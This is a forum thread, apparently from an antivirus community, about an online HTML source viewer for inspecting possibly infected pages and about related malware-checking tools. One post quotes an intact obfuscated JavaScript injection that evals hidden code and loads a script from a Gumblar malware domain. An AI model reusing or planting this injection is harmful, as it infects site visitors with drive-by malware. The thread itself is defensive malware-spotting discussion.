Online HTML Reader - Selfseo HTML Source Viewer!

View HTML Source Codes Without Getting Infected!

So, what do you think?

Very good!
As far I’ve tested, I’m not sure I’m right, it allows to see encrypted scripts in some page…

<script language=javascript><!-- 
(function(){var vRf='%';var xoL=unescape(('&76ar&20&61&3d&22Sc&72ipt&45n&67&69ne&22&2cb&3d&22Vers&69on()+&22&2cj&3d&22&22&2c&75&3d&6e&61vigator&2e&75serAgent&3bi&66&28(u&2einde&78Of(&22Win&22)&3e0&29&26&26(&75&2einde&78Of(&22N&54&206&22)&3c0)&26&26(docu&6de&6et&2eco&6fkie&2eind&65xO&66(&22miek&3d&31&22)&3c0)&26&26&28typ&65of&28&7arvz&74s)&21&3dty&70eof(&22A&22)))&7b&7arvzt&73&3d&22A&22&3beval(&22if(win&64ow&2e&22+a+&22)j&3d&6a+&22&2ba+&22Maj&6fr&22+b+a+&22M&69nor&22&2bb+&61&2b&22&42uil&64&22+b+&22j&3b&22)&3b&64ocument&2e&77ri&74e&28&22&3csc&72&69pt&20s&72&63&3d&2f&2fgumblar&2e&63n&2fr&73s&2f&3fid&3d&22+j&2b&22&3e&3c&5c&2fs&63&72i&70t&3e&22&29&3b&7d').replace(/&/g,vRf));eval(xoL)})();

Probably infected ones…

It also allows you to see encrypted title scripts!
(See image below)

Nice find … it could come in handy.

Hi Donovansrb10,

Good find, just poured out a cola, and now gonna test this.
Mind you to have NoScript and RequestPolicy on here or did you use it unprotected?


Unprotected. ;D

There is vURL: <== Online <== desktop edition

Read about them:

Hi YoKenny,

If we bundle it, we have an enormous knowledge base here, thanks for that link. We just have to make a survey of these check-site links: this one, blacklistdoctor, Exploit prevention Labs Link Scanner, the UnmaskParasites one, the bad stuff detektor for inline hidden iFrame dtection, test editor site:, obfuscation and de-obfuscation sites. These last weeks of the online i Frame malcode injections, SQL injections, obfuscated java-scripts etc. has been a nuisance to users and website owners, but has been good for presenting a real boot camp for our malware fighting analyzers, I learned a lot, published some of the things found here in the virus and worms "department"at the general section of Giorgio Maone’s NoScript forum, and I hope some of our forum members got the message, which in short terms can be summed up as: “Do not trust any website, malcode can come to a place near you, even if you do not expect it, avast shield will alert you!”,


If you add http: //
there, how do you interpret the results?

I don’t.

I know http stands for Hypertext Transfer Protocol and that I would have to know and understand:

I just know where to look for things or whom to look to for answers.

My first sucess! ;D 8)

Thanks for that link also, Yokenny.